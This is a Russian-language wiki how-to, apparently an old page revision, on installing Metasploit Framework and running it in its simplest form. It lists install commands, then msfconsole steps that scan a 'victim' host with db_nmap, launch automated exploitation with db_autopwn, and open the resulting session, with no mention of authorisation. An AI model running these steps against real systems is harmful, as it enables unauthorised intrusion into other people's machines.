Это старая версия документа.
Metasploit Project — проект, посвященный информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплоитов. Наиболее известен проект Metasploit Framework — удобная платформа для создания и отладки эксплоитов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности. http://ru.wikipedia.org/wiki/Metasploit
В начале необходимо установить Metasploit Framework. Для этого поставим все необходимые пакеты.
sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems sudo apt-get install subversion sudo apt-get build-dep ruby sudo apt-get install ruby-dev libpcap-dev sudo apt-get install rubygems libsqlite3-dev sudo gem install sqlite3-ruby sudo apt-get install rubygems libmysqlclient-dev sudo gem install mysql
Далее скачиваем Metasploit Framework вот тут: http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run:
wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run chmod +x framework-4.*run
И запускаем…
sudo ./framework-4.*run
После установки необходимо обновить Metasploit Framework
sudo msfupdate
Теперь самый простой вариант использованияMetasploit Framework. Запустим консоль.
Msfconsole
Теперь добавим нашу жертву в базу данных и информацию про его порты.
db_nmap -sT -sV 192.168.1.1
Отправим все на автоматический взлом .
db_autopwn -p -t -e
Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее.
session -i 1
Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите:
help
В конце для выхода обратно из сессии и удаления данного хоста из базы данных проделываем следующую операцию:
exit hosts -d 192.168.1.1
Автор | Раздел |
---|---|
Михайлов Александр (ChelAxe) | как сделать … |